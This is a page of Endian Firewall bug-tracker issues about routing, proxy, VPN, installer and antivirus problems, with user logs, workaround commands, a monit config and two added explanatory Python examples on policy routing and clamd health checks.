luca-endian   
2013-08-06 15:50   
This has been fixed today





View Issue Details
4172 [Endian Firewall] Proxy DNS trivial always 2011-09-29 08:41 2013-08-01 15:46
stefano-endian  
 
normal  
feedback 2.4  
reopened  
none    
none  
   
Broken link to malwaredomains
There is a hyperlink in the DNS proxy, under "Anti spyware", labelled "Learn more about the spyware listening post". The new link should be either

http://www.malwaredomains.com/wordpress/?p=1988 or

http://doc.emergingthreats.net/bin/view/Main/SpywareListeningPost (here the listening posts are described, so this should be the correct link)
1. go to Proxy --> DNS --> anti spyware
2. click on the "Learn more about the spyware listening post" link.
Notes
(0007961)
stefano-endian   
2012-07-30 08:03   
This is solved in my last Mini installation:

bash-3.1# rpm -qf /home/httpd/cgi-bin/antispyware.cgi
efw-dnsmasq-2.9.5-0.endian16





View Issue Details
4555 [Endian Firewall] Hardware related (kernel, drivers, hardware) feature always 2013-07-18 13:34 2013-07-18 13:34
marioeirea  
 
normal  
new 2.5  
open  
none    
none  
   
Support for BCM5717
Please add support for BCM5717
There are no notes attached to this issue.





View Issue Details
4549 [Endian Firewall] OpenVPN Client and Server major always 2013-05-27 02:27 2013-07-12 21:27
Sheldmandu  
 
normal  
feedback 2.5  
open  
none    
none  
   
OpenVPN client files not created using user.conf.tmpl
It appears the OpenVPN client files are never created on the 2.5.1 version of EFW. There is a /var/openvpn/clients directory but it's empty. Modifying openvpn.conf.tmpl and uncommenting client-config-dir clients and restarting OpenVPN on EFW doesn't achieve anything either.

It appears that the file /etc/openvpn/user.conf.tmpl is never actually used to create the client files, which is why it's not possible to set a static IP for an OpenVPN client or push a DNS server or domain. This used to work on 2.4.x

Please advise of a workaround for the short term, perhaps some script can be run manually to create the files using the user.conf.tmpl
Notes
(0008445)
Anonymous   
2013-07-12 21:27   
Any news???





View Issue Details
4553 [Endian Firewall] Kernel minor have not tried 2013-07-12 04:32 2013-07-12 04:32
Neddy x64  
 
high  
new 2.5  
open  
none    
none  
   
Number of allowed concurrent connections exceeded
Enabled Endian Firewall and transparent firewall for dozens of users; after half an hour, these messages appear.

How could I increase number of concurrent connections?
System 2013-07-12 10:49:49 syslog-ng (2674) Number of allowed concurrent connections exceeded; num="256", max="256"
System 2013-07-12 10:49:49 syslog-ng (2674) Number of allowed concurrent connections exceeded; num="256", max="256"
System 2013-07-12 10:49:49 syslog-ng (2674) Number of allowed concurrent connections exceeded; num="256", max="256"
System 2013-07-12 10:49:49 syslog-ng (2674) Number of allowed concurrent connections exceeded; num="256", max="256"
System 2013-07-12 10:49:49 syslog-ng (2674) Number of allowed concurrent connections exceeded; num="256", max="256"
There are no notes attached to this issue.





View Issue Details
4545 [Endian Firewall] Proxy - HTTP major sometimes 2013-05-07 13:21 2013-06-29 19:10
rodrigor.bnu Windows  
Windows Server  
high 2008 R2  
new 2.5  
open  
none    
none  
   
error squid_ldap_group
Hello guys,

I started to test the Endian 2.5.1 and enjoyed. Currently I'm testing on a VM in Hyper-v. Well, already configured for integration with Active Directory and is listing the users and groups usually ok communication. I began to configure some access policies for a group of AD and early functioned properly, but after some time the policies do not work anymore and blocked everything, just out of nowhere. Since this policy is like first. When running tail -f /var/log/squid/cache.log the following errors appear:

user filter '(&(objectClass=person)(sAMAccountName=squid))', searchbase 'dc=edusoft,dc=net'
attempting to authenticate user 'CN=squid,CN=Users,DC=edusoft,DC=net'
Connected OK
group filter '(&(objectClass=person)(sAMAccountName=squid)(memberOf=CN=Suporte,OU=Groups Edusoft,OU=Edusoft,DC=edusoft,DC=net))', searchbase 'dc=edusoft,dc=net'
squid_ldap_group WARNING, LDAP search error 'Operations error'
Connected OK
group filter '(&(objectClass=person)(sAMAccountName=squid)(memberOf=CN=Administrators,CN=Builtin,DC=edusoft,DC=net))', searchbase 'dc=edusoft,dc=net'

At another time also appeared the message:

Can't contact LDAP server

It seems that error is occurring in the validation of the AD group, but when I edit an access policy appears normally AD users and groups.

Any idea what it might be?

Rodrigo
After login and navigate the links, after some time the links are blocked released.
erro_endian.JPG (73,887) 2013-05-07 13:21
https://bugs.endian.com/file_download.php?file_id=1049&type=bug
Notes
(0008439)
yanqian   
2013-06-29 19:10   
Hi,
I am not familiar with endian firewall, but I got the same error before when I ran squid in a linux box, I had to add "-R" option to squid_ldap_group helper, then issue solved.





View Issue Details
1132 [Endian Firewall] Migration minor have not tried 2008-07-16 15:44 2013-06-05 14:58
mablass  
 
normal  
acknowledged 2.2-rc1  
open  
none    
none  
   
Static Routes defined in GUI don't work properly
I defined some static routes in the GUI. Ping to the destination network worked correctly; ssh, for example, did not. After trying some things out with firewall settings I decided to put the routes directly into the system by using route add -net 1 ... on the efw server. Now everything is fine. As the new 2.2 allows using a GUI but the result is not working, I guess it's a problem :)

Notes
(0001451)
mablass   
2008-07-16 17:04   
update: the problem can only be solved by adding some additional NAT rule for the target network. Actually I believe the topic is related to 0000444. Ping works with the GUI definition but not other services
(0001452)
peter-endian   
2008-07-16 17:11   
are you sure that you don't miss the return route or default route on the other side?
mentioning the NAT rules would make me think of that
(0001463)
mablass   
2008-07-18 21:33   
when using a hardwarebox everything works fine. i just downgraded to endian 2.1.2 and added static routes. everything is ok - but 2.2 makes trouble
(0001995)
Brains   
2009-02-24 16:21   
Confirmed - static routes added via the GUI are never passed down to the kernel.

Adding routes via the shell works as intended (ie. route add -net <network> gw <gateway>)
(0002611)
Telemak   
2009-06-12 14:44   
Confirmed for me too with 2.2 final
(0002612)
luca-endian   
2009-06-12 15:59   
Can you paste the output of these commands:
cat /var/efw/routing/config
ip rule show
(0002618)
Telemak   
2009-06-12 19:36   
In this configuration, the route doesn't work all the time, but only after making a traceroute on the PC.
But after putting it in with the route add command, maybe it works better. I will have the result of this test on Monday.
(0002652)
Telemak   
2009-06-22 15:44   
It's all ok if I put the routes with this command in ssh :

route add -host 80.74.67.37 gw 10.10.13.2
route add -net 81.1.62.224 netmask 255.255.255.224 gw 10.10.13.2
route add -net 136.9.0.0/16 gw 10.10.13.2

For helping...

Telemak
(0002653)
peter-endian   
2009-06-22 16:49   
you created routing entries which direct traffic *from* 10.10.13.00/24 to several networks to the gateway 10.10.13.2

For example this rule:
on,10.10.13.0/24,6x.xx.xx.0/24,10.10.13.2,,,,,,,,

means that *only* traffic from 10.10.13.0/24 to that external network goes through gateway 10.10.13.2. Maybe that is not what you want. Maybe you want to direct *all* traffic to that external IP through the gateway?

That's what you did with the route commands. Those route commands aren't exactly the same configuration as through the GUI. BTW, "route" is a deprecated interface and may be overruled by other ip rule entries.

Try to remove the source-part of your GUI rules, that should then be the same as you did with the route commands.
(0002692)
luca-endian   
2009-06-29 14:13   
can you gently paste the output of this command:

ip route show table 5

thank you
(0002694)
Telemak   
2009-06-29 14:34   
Putting a source or not? I will try, but if I have the choice, I prefer putting a source. (And all the PCs concerned are really in 10.10.13.0/24; the others may not use these routes.)

ip route show table 5 gives:
default via 10.10.13.2 dev br0
(0002702)
Telemak   
2009-06-30 12:38   
In the GUI, on the routing page, the source is shown as required. But like you say, we can not fill it and get no GUI error.
I've corrected the routes by removing the source and not putting them manually into the kernel routing. Then I obtain:

Command: route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
10.10.23.0 * 255.255.255.0 U 0 0 0 eth1
10.10.13.0 * 255.255.255.0 U 0 0 0 br0
default 10.10.23.200 0.0.0.0 UG 0 0 0 eth1

Command: ip route show table 5
Same as above

Command: ip route show
0: from all lookup local
5: from all to 10.10.13.200/24 lookup main
5: from all to 10.10.23.0/24 lookup main
10: from all to 62.23.96.0/24 lookup 5
10: from all to 80.74.67.37 lookup 5
10: from all to 81.1.62.224 lookup 5
10: from all to 136.9.0.0/16 lookup 5
10: from all to 192.28.103.0/24 lookup 5
10: from all to 193.56.211.51 lookup 5
10: from all to 193.56.211.53 lookup 5
10: from all to 193.56.211.81 lookup 5
10: from all to 194.51.14.0/16 lookup 5
10: from all to 194.206.181.240 lookup 5
10: from all to 194.206.181.252 lookup 5
10: from all to 195.46.218.22 lookup 5
10: from all to 212.234.59.105 lookup 5
10: from all to 212.234.59.239 lookup 5
10: from all to 66.225.239.127 lookup 5
10: from all to 212.234.229.40 lookup 5
10: from all to 10.10.10.0/24 lookup 5
10: from all to 10.10.11.0/24 lookup 5
10: from all to 10.10.12.0/24 lookup 5
10: from all to 10.10.14.0/24 lookup 5
199: from all fwmark 0x7e0/0x7f8 lookup uplink-main
200: from 10.10.23.100 lookup uplink-main
32766: from all lookup main
32767: from all lookup default

Tell me if you want something more.
(0003649)
n9yty   
2010-01-06 15:51   
Is this still under investigation? I am setting up a new endian v2.3 system and am seeing the exact same problem. Adding a route in the GUI does not allow it to work. Primarily I am trying to add a route to a network behind another router on the GREEN interface. Setting it up in the GUI without a source address does not update the kernel tables, and other output is identical to what is shown above in terms of ip route show table 5 and the efw/routing/config file. Yet doing a route command at the shell works as expected.
(0003726)
sifi986   
2010-01-30 13:12   
ip is the replacement command from the iputils package, and is used to alter routing tables in Endian. Routes can be placed in many tables, only table 254 (main) is operated on by kernel routing table or displayed in output of route command.

Note that tables other than 254 are not displayed by the route command i.e. table 5 is not shown, but is acted on if input to GUI is in the correct format and routing will be successful.

When Endian adds routes to networks behind Green on the EFW page Network/Routing/Static routing/Add new route, the new route is added to table 5 and can be seen as above with the command "ip route show table 5"; a more detailed display is available using "ip rule show" and "ip route show all". Note: table 5 is a rule.

A source address need not be specified (even though the field is marked with an asterisk: *This Field is required).

The destination network must be entered in CIDR notation, i.e. /24 for 255.255.255.0.

Route Via* Static Gateway is entered as an IP address in dotted decimal notation.

After entering the details of the network behind Green into the GUI, routing is fully functional on 2.3.

Maybe Endian could add a note to the page advising to use CIDR notation for addresses in the network dialogue boxes on this screen. (The new documentation on the web has been updated to reflect this too, which is good. Click help in the top right-hand corner.)
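The lookup order discussed in notes 0002653 and 0003726, as an added Python example that is not part of the original thread or of Endian's code: it walks the policy rules in priority order and shows why a destination can be routed through table 5 while the main table (the only one `route` prints) still points at the default gateway. The rule and route text is taken from the outputs posted above; the source-restricted variant and all function names are constructed for illustration.

```python
import ipaddress
import re

# Subset of the rule list posted in note 0002702 (the format `ip rule show` prints).
RULES_TEXT = """\
0: from all lookup local
5: from all to 10.10.13.200/24 lookup main
5: from all to 10.10.23.0/24 lookup main
10: from all to 80.74.67.37 lookup 5
10: from all to 136.9.0.0/16 lookup 5
199: from all fwmark 0x7e0/0x7f8 lookup uplink-main
200: from 10.10.23.100 lookup uplink-main
32766: from all lookup main
32767: from all lookup default
"""

# Table 5 as posted in note 0002694; "main" is the `route` output from note
# 0002702 rewritten in `ip route` syntax. Tables not listed are treated as empty.
TABLES_TEXT = {
    "5": "default via 10.10.13.2 dev br0",
    "main": "10.10.23.0/24 dev eth1\n"
            "10.10.13.0/24 dev br0\n"
            "default via 10.10.23.200 dev eth1",
}

RULE_RE = re.compile(
    r"^(?P<prio>\d+):\s+from (?P<src>\S+)(?: to (?P<dst>\S+))?"
    r"(?: fwmark (?P<mark>\S+))? lookup (?P<table>\S+)$"
)


def _net(text):
    """'all', 'default' and a missing selector mean 0.0.0.0/0; host bits are tolerated."""
    if text in (None, "all", "default"):
        text = "0.0.0.0/0"
    return ipaddress.ip_network(text, strict=False)


def parse_rules(text):
    rules = []
    for line in text.strip().splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised rule: {line!r}")
        rules.append({"prio": int(m["prio"]), "src": _net(m["src"]),
                      "dst": _net(m["dst"]), "fwmark": m["mark"],
                      "table": m["table"]})
    return sorted(rules, key=lambda r: r["prio"])  # stable: equal priorities keep order


def parse_routes(text):
    routes = []
    for line in text.strip().splitlines():
        words = line.split()
        opts = dict(zip(words[1::2], words[2::2]))  # "via X dev Y" -> {"via": X, "dev": Y}
        routes.append((_net(words[0]), opts.get("via"), opts.get("dev")))
    return routes


def best_route(routes, dst):
    """Longest-prefix match inside one table, or None."""
    hits = [r for r in routes if dst in r[0]]
    return max(hits, key=lambda r: r[0].prefixlen) if hits else None


def resolve(rules, tables, src, dst):
    """Route decision for an unmarked packet: first rule whose table has a route wins."""
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for rule in rules:
        if rule["fwmark"] or src not in rule["src"] or dst not in rule["dst"]:
            continue
        route = best_route(tables.get(rule["table"], []), dst)
        if route:  # a table without a matching route falls through to the next rule
            return {"rule": rule["prio"], "table": rule["table"],
                    "via": route[1], "dev": route[2]}
    return None


RULES = parse_rules(RULES_TEXT)
TABLES = {name: parse_routes(text) for name, text in TABLES_TEXT.items()}

# Constructed variant: the same destination with a source restriction, as in the
# GUI rule discussed in note 0002653.
SOURCE_RULES = parse_rules(RULES_TEXT.replace(
    "10: from all to 136.9.0.0/16", "10: from 10.10.13.0/24 to 136.9.0.0/16"))

if __name__ == "__main__":
    print("policy lookup :", resolve(RULES, TABLES, "10.10.13.50", "136.9.1.1"))
    print("main only     :", resolve(parse_rules("32766: from all lookup main"),
                                     TABLES, "10.10.13.50", "136.9.1.1"))
    print("other source  :", resolve(SOURCE_RULES, TABLES, "10.10.23.77", "136.9.1.1"))
```
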
(0005179)
ytech   
2010-11-23 02:07   
I have the latest version 2.41 (2.6.32.25-57.e40.i586) the same version with 2 real machines and one virtual lab and the issue continues. It is necessary to add route manually.

Thanks
(0007404)
Sheldmandu   
2011-09-14 06:18   
I have the latest version as well and there is still the issue. Adding the route manually by connecting via SSH and running route add command works fine as a workaround
(0007740)
shairozan   
2012-03-02 18:11   
I also have the latest version 2.5 R1 and this is still an issue. Is anyone actually working on this issue? The last time I see a non-reporter working on this was in 2009
(0007858)
cemendes   
2012-05-06 03:23   
That is still a problem on 2.5.1. Any way we can get it fixed?
(0008433)
ltinti   
2013-06-05 14:58   
To save the route commands manually, add them to /etc/init.d/rc.local.

Something like

#!/bin/sh

route add -net 10.0.0.0/24 gw 192.168.0.2

exit 0





View Issue Details
4547 [Endian Firewall] Application Level Proxies block always 2013-05-21 15:33 2013-05-28 09:22
ddimitrov@computel.bg  
 
normal  
new 2.5  
open  
none    
none  
   
HTTP Proxy - (104) Connection reset by peer
Kernel version: 2.6.32.43-57.e48.i686.PAE

When the HTTP Proxy filter is ON, a web page can't be loaded at all (maybe the issue will happen with others, but I can't say at the moment). Instead, a web page from Endian saying "(104) Connection reset by peer" appears. When I turn the HTTP proxy off I can successfully load the web page in question. The problematic web page is http://www.minfin.bg.
The issue arisen regardless of the browser.

Thank you in advance.
Err(104)_.jpg (134,572) 2013-05-21 15:33
https://bugs.endian.com/file_download.php?file_id=1051&type=bug
Notes
(0008432)
ddimitrov@computel.bg   
2013-05-28 09:22   
This issue was already reported and reproduced through another channel (Panda Support Channel).
Endian support is aware of this issue and soon will provide a solution. Till then:

As a temporary solution add the ip address of the web sites involved into the bypass proxy list.





View Issue Details
4548 [Endian Firewall] Documentation minor N/A 2013-05-23 14:00 2013-05-23 14:00
buckmanr  
 
high  
new 2.5  
open  
none    
none  
   
Please provide documentation in PDF
Online HTML does not print correctly -- exceeds margins.

Copy and paste into Word requires excessive time trying to reformat.

Request a PDF of the documentation, please.
There are no notes attached to this issue.





View Issue Details
4374 [Endian Firewall] Installation minor always 2012-06-04 19:41 2013-05-16 22:23
ms  
 
normal  
new 2.5  
open  
none    
none  
   
Installation of Endian Firewall from USB flash drive fails
When trying to install EFW 2.5.1 from a USB flash drive, the installation fails before the first user input is required.
The system is booting the vmlinuz which is located on the USB drive. After that the /etc/inittab from instroot.gz is read and /bin/installer is executed. This installer file runs in an endless loop and the VGA display flashes blue/black.

Yes, I double-checked the MD5 checksums on the EFW installation ISO file.
I tried several methods to create the USB drive
1. using unetbootin 5.75 (http://unetbootin.sourceforge.net/) on a Windows platform
2. dd/copy files from EFW installation CD-ROM to USB drive
mountsource.sh (3,058) 2012-06-04 19:53
https://bugs.endian.com/file_download.php?file_id=950&type=bug
Notes
(0007890)
ms   
2012-06-04 19:55   
I tracked the issue down to the installation file /bin/mountsource.sh
This file tries to mount the USB flash drive and checks for Endian installer files. Unfortunately /bin/mountsource.sh won't find the USB drive unless it is formatted with ext3 file system.
If it is formatted with some different (most likely vfat when working with Windows), /bin/mountsource.sh fails and /bin/installer loops without ending.

Please find attached a fixed version of /bin/mountsource.sh
In this file I removed the filesystem ext3 used with the mount command. I would be happy if you check with my solution and consider including it in the next Endian Firewall release.
(0008393)
drzoidberg33   
2013-03-12 18:54   
Why hasn't this fix been pushed up to the release? I really know very few people who don't use flash drives to install things these days and 9 out of 10 times they won't be formatted as ext3.
(0008430)
psraj   
2013-05-16 22:23   
How do you access /bin/mountsource.sh from the USB image?





View Issue Details
4472 [Endian Firewall] Uncategorized major always 2012-10-22 23:43 2013-05-08 05:44
marioeirea  
luca-endian  
normal  
resolved 2.5  
no change required  
none    
none  
   
SIP Proxy Endian 2.5.1
Endian 2.5.1 rewrites SIP packets exiting tap1 with the IP of the main interface. It also makes the changes inside the SIP packet, which makes me believe there is some sort of SIP proxy action. The problem is I cannot find a SIP proxy installed, and this was a fresh install of Endian 2.5.1, not an upgrade. Is there some daemon running in the back that does these rewrites? Please see the attached Wireshark sniff. I have removed public IP information. Please note this capture was taken issuing the command: "tcpdump -s 0 -i tap1 -w tap1.pcap". The correct flow should have the internal IP of the phone as the source and not the external IP of the Endian uplink interface. I believe this started happening when I enabled the web proxy in transparent mode with dansguardian but cannot be sure. When the server replies, it replies to the Endian public IP address over the public internet.
tap1 capture.jpg (258,270) 2012-10-22 23:43
https://bugs.endian.com/file_download.php?file_id=997&type=bug
Notes
(0008251)
luca-endian   
2012-10-29 17:31   
sip proxy has been removed long time ago now this stuff is handled by linux kernel with conntrack modules.
(0008254)
marioeirea   
2012-10-29 18:43   
Right. However, it should not be changing the connections leaving the tap1 interface. Especially not with Endian's red IP as the source address. If a sip device is supposed to connect over the VPN there should not be a rewrite.
(0008429)
marioeirea   
2013-05-08 05:43   
So this is what happens: When the EFW is restarted, the phones attempt to reconnect before the VPN is established. At this point, conntrack intercepts the connection, rewriting all packets leaving the TAP interface with the RED address. To fix the issue, one must flush the conntrack table issuing the command "conntrack -F conntrack". To prevent this from happening in the future, enable the outgoing firewall and block the destination IP the sip connections will connect to over the VPN. This way the connection is not intercepted with conntrack until the proper interface comes up.





View Issue Details
4391 [Endian Firewall] Hardware related (kernel, drivers, hardware) block have not tried 2012-07-06 01:50 2013-05-08 01:49
diwoda  
 
normal  
new 2.5  
open  
none    
none  
   
System not recognizing Intel nic based on 82574L
Possibly somehow related to issue 0003451

System has two onboard NICs, one is Intel 82574L, the other 82579LM. One of those two NICs is not seen by 2.5 in the network configuration but works without any problems in 2.4... I think both NICs use the e1000e driver.

I've seen a difference in loading network driver as it seems the 2.4 uses 1.2.20-NAPI while 2.5 is loading at the same point 1.0.2-k2.

Any idea?
Notes
(0008428)
spittlbm   
2013-05-08 01:49   
This is a kernel module issue that could be resolved by updating the e1000e module to a more recent version.





View Issue Details
4544 [Endian Firewall] Endian Firewall crash always 2013-05-02 07:59 2013-05-02 07:59
mhellemans  
 
urgent  
new 2.2-rc3  
open  
none    
none  
   
Upgrading to 2.5.1 (Development) causes error code
Running efw-upgrade command result in following error message:

========================
Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1



Committing transaction...
Preparing... ######################################## [ 0%]
error: file /etc/init.d from install of chkconfig-1.3.11.2-1 conflicts with file from package initscripts-2.2.41-0.endian5
error: file /bin/login from install of util-linux-ng-2.13.1-6_WR.endian5 conflicts with file from package shadow-utils-4.0.3-56.endian1


ERROR: Error during upgrade of rpm
ERROR: Error during upgrade of rpm
There are no notes attached to this issue.





View Issue Details
4543 [Endian Firewall] Endian Network block always 2013-05-02 06:59 2013-05-02 06:59
lorenzo.spinelli endian  
firewall  
immediate community  
new 2.5  
open  
none    
none  
   
green network fault in hyper-v 2012 legacy adapter
After few hours from reboot green don't respond. I've 2 uplink network in same hyper-v 2012 network Adapter configuration that work without problem.
Reload.
There are no notes attached to this issue.





View Issue Details
4542 [Endian Firewall] Proxy - HTTP tweak always 2013-05-01 02:37 2013-05-01 02:37
albertgordojr 2.5.1  
 
high  
new 2.5  
open  
none    
none  
   
WCCP in Proxy
Hi,

Is it possible to set up WCCP in the proxy? I can see that in version 2.5.1 community, wccp2 is already compiled. I have added the wccp2_* setup in the squid template and created a GRE tunnel manually using ip tunnel and ifconfig to bring up the GRE interface.

The problem is, I don't see any tcpdump traffic in the GRE tunnel that I created. It seems the wccp request is not getting to the wccp router.

Please help.

Thank you.

Regards,

Albert
There are no notes attached to this issue.





View Issue Details
4162 [Endian Firewall] Proxy HTTP major random 2011-09-20 09:30 2013-04-23 14:17
luca-endian  
ardit-endian  
normal  
resolved 2.4.1  
no change required  
none    
none  
   
clamd crash, tcp socket should be monitored
Hi Guys,

this happens randomly:

Sep 2 09:19:46 xxx havp[3818]: Scanner errors: Clamd: Could not connect to scanner socket (lasturl: http://www.google.it/)
Sep 2 09:19:47 xxx havp[3824]: Clamd: Could not connect to scanner! Scanner down?
Sep 2 09:20:45 xxx havp[3813]: Clamd: Could not connect to scanner! Scanner down?
Sep 2 09:20:45 xxx havp[3811]: Scanner errors: Clamd: Could not connect to scanner socket (lasturl: http://crl.microsoft.com/pki/crl/products/CodeSignPCA2.crl)
Sep 2 09:21:06 xxx havp[4051]: Clamd: Could not connect to scanner! Scanner down?
Sep 2 09:21:06 xxx havp[4034]: Scanner errors: Clamd: Could not connect to scanner socket (lasturl: http://check.sanasecurity.com/)
Sep 2 09:21:06 xxx havp[4034]: 127.0.0.1 POST 200 http://check.sanasecurity.com/ 264+495 SCANERROR Clamd: Could not connect to scanner socket

**POSSIBLE SOLUTION**

We should check the clamd socket with monit, which is pretty easy since monit supports the CLAMAV protocol!

root@xxx:/etc/monit.d # cat clamd.conf
 check process clamd with pidfile /var/run/clamav/clamd.pid
   group virus
   start program = "/etc/init.d/clamd start"
   stop program = "/etc/init.d/clamd stop"
   if failed host 127.0.0.1 port 3310 protocol CLAMAV for 5 cycle then restart
   if 5 restarts within 5 cycles then timeout
   depends on clamavd_bin
   mode manual

 check file clamavd_bin with path /usr/sbin/clamd
   group virus
   if failed checksum then unmonitor
   if failed permission 755 then unmonitor
   if failed uid root then unmonitor
   if failed gid root then unmonitor
   mode manual

This would increase reliability for the HTTP proxy and the SMTP proxy as well!
What do you think?
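The kind of application-level probe the monit rule above depends on, written out as an added Python example (not from the ticket or from Endian): it sends clamd's PING command and expects PONG, then applies the "5 failed cycles, then restart" policy to a series of results. The stub servers, the short timeouts and all helper names are constructed for the demonstration.

```python
import socket
import socketserver
import threading
import time


def clamd_ping(host="127.0.0.1", port=3310, timeout=3.0):
    """Probe clamd at the application layer: send PING, expect PONG."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(b"nPING\n")          # newline-delimited command form
            reply = sock.recv(64)
    except ConnectionRefusedError:
        return "refused"                      # nothing listening: daemon is down
    except socket.timeout:
        return "timeout"                      # port open, scanner not answering
    except OSError:
        return "error"
    return "ok" if reply.rstrip(b"\r\n\0") == b"PONG" else "bad-reply"


def restarts_needed(statuses, cycles=5):
    """Polling cycles at which a restart fires after `cycles` consecutive failures."""
    failures, fired = 0, []
    for index, status in enumerate(statuses):
        failures = 0 if status == "ok" else failures + 1
        if failures == cycles:
            fired.append(index)
            failures = 0                      # start counting again after a restart
    return fired


def start_stub(reply):
    """Constructed stand-in for clamd; reply=None simulates a hung scanner."""
    class Handler(socketserver.StreamRequestHandler):
        def handle(self):
            self.rfile.readline()
            if reply is None:
                time.sleep(1.0)               # accept the command, never answer
            else:
                self.wfile.write(reply)

    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), Handler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def free_port():
    """A loopback port with no listener, to simulate a crashed daemon."""
    with socket.socket() as sock:
        sock.bind(("127.0.0.1", 0))
        return sock.getsockname()[1]


def demo():
    servers = {"healthy": start_stub(b"PONG\n"),
               "hung": start_stub(None),
               "wrong": start_stub(b"UNKNOWN COMMAND\n")}
    results = {name: clamd_ping(port=srv.server_address[1], timeout=0.3)
               for name, srv in servers.items()}
    results["closed"] = clamd_ping(port=free_port(), timeout=0.3)
    for srv in servers.values():
        srv.shutdown()
        srv.server_close()
    return results


if __name__ == "__main__":
    print(demo())
    history = ["ok", "refused", "refused", "ok"] + ["timeout"] * 5 + ["ok"]
    print("restart at cycles:", restarts_needed(history))
```

A process that still holds its pidfile but no longer answers on the socket shows up here as "timeout" or "refused", which is the case a pidfile-only check misses.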
Notes
(0008426)
ardit-endian   
2013-04-23 14:16   
This also happens on 2.5 fully up to date. After dedicated tests :D and monitoring, the problem is caused *somehow* by the updates: if the updates are weekly it happens, but if they are set to daily it doesn't happen anymore.
(0008427)
ardit-endian   
2013-04-23 14:17   
set the update to daily for the antivirus and will not happen





View Issue Details
3221 [Endian Firewall] Proxy HTTP major sometimes 2010-10-25 17:41 2013-04-16 19:29
bortol  
lorenzo-endian  
normal  
feedback 2.4  
open  
none    
none  
   
HTTP proxy doesn't return anything after some time. If the Squid cache is flushed, the firewall works correctly again
After some use the firewall doesn't return pages. Ping is working, DNS also.
If I flush the Squid cache, the proxy is OK again.
In /var/log/squid/cache.log there are some errors:

TCP connection to 127.0.0.2/9999 failed

and very frequently also this:

httpReadReply: Excess data from "GET http://cr-tools.clients.google.com/service/check2?appid=%7B430FD4D0-B729-4F6$


other error in cache.log:

Initialising SSL.
2010/10/25 13:36:28| Store logging disabled
2010/10/25 13:36:28| Referer logging is disabled.
2010/10/25 13:36:28| DNS Socket created at 0.0.0.0, port 35399, FD 10
2010/10/25 13:36:28| Adding nameserver 127.0.0.1 from /etc/resolv.conf
2010/10/25 13:36:28| helperOpenServers: Starting 20 'ncsa_auth' processes
2010/10/25 13:36:29| Accepting transparently proxied HTTP connections at 0.0.0.0, port 8080, FD 35.
2010/10/25 13:36:29| Accepting SNMP messages on port 3401, FD 36.
2010/10/25 13:36:29| WCCP Disabled.
2010/10/25 13:36:29| Configuring Parent 127.0.0.1/9999/0
2010/10/25 13:36:29| Configuring Parent 127.0.0.2/9999/0
2010/10/25 13:36:29| Configuring Parent 127.0.0.1/9998/0
2010/10/25 13:36:29| Loaded Icons.
2010/10/25 13:36:29| Ready to serve requests.
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| TCP connection to 127.0.0.2/9999 failed
2010/10/25 13:37:11| Detected DEAD Parent: content2
2010/10/25 13:37:11| Failed to select source for 'http://123.123.123.123/wpad.dat'
2010/10/25 13:37:11| always_direct = 0
2010/10/25 13:37:11| never_direct = 1
2010/10/25 13:37:11| timedout = 0
2010/10/25 13:37:12| Failed to select source for 'http://crl.verisign.com/pca3.crl'
2010/10/25 13:37:12| always_direct = 0
2010/10/25 13:37:12| never_direct = 1
2010/10/25 13:37:12| timedout = 0



Sorry for my english and also for my very low technical know-how

I've installed endian in my School. Now this problem is blocking navigation everyday....


Luigi
Notes
(0005204)
gmar_87   
2010-11-25 10:14   
I too am having this problem. I restored an Endian Firewall 2.3 backup config to an identical hardware spec server also running version 2.3 and see this issue everyday!

I reinstalled Endian, this time with 2.4.1 and restored the backup, but still occurring. The end-user sees "Read Error. Connection reset by peer".

My cache log shows:
2010/11/25 16:39:52| TCP connection to 127.0.0.2/9999 failed
2010/11/25 16:39:52| Detected DEAD Parent: content2

I have now disabled antivirus scans in my content filters to see if that is the cause...
(0005264)
lorenzo-endian   
2010-12-02 09:26   
Hi bortol and gmar_87,

does your EFW work after disabling the antivirus scan?

This info would be useful to troubleshoot the problem!

Thanks in advance!

Lo
(0005265)
gmar_87   
2010-12-02 09:34   
Hi Lo,

Proxy seems to be stable after disabling anti-virus scanning under proxy content filter settings.
Uptime = 6d 22h 44m so far..

Cheers,
John
(0005266)
gmar_87   
2010-12-02 09:36   
also seemed to only occur under heavy load/traffic.
(0005303)
gmar_87   
2010-12-05 23:23   
Definitely related to having Anti virus scanning enabled under content filter.
EFW has been up for 10d 12h 20m after disabling this option.
(0005369)
bortol   
2010-12-14 09:27   
I've reinstalled all with release 2.4.0 and I don't have any problem from 31d 9h 53m (with antivirus scan actived).
(0005383)
gmar_87   
2010-12-15 22:24   
I can confirm that this issue only occurs on release 2.4.1
(0005493)
lorenzo-endian   
2011-01-18 11:54   
Hi bortol,

can you please provide the version of your efw-clamav package?

You can get it with the command

rpm -q efw-clamav

Thanks in advance!

Lo
(0005501)
bortol   
2011-01-18 20:37   
Now I have reinstalled version 2.4.0 and the efw-clamav is efw-clamav-2.3.17-0.endian5
I don't know the version of efw-clamav in 2.4.1 ... sorry

Bye

Bortol

P.S. in Italian

I don't know English well, so I struggle to write in that language... I saw that your name is Lorenzo: are you Italian, by any chance?

Since I was not able to get 2.4.1 working without hangs, I decided to reinstall 2.4.0, with which I have no problems except when downloading some large PDF files.
(0005502)
lorenzo-endian   
2011-01-18 20:47   
Hey,

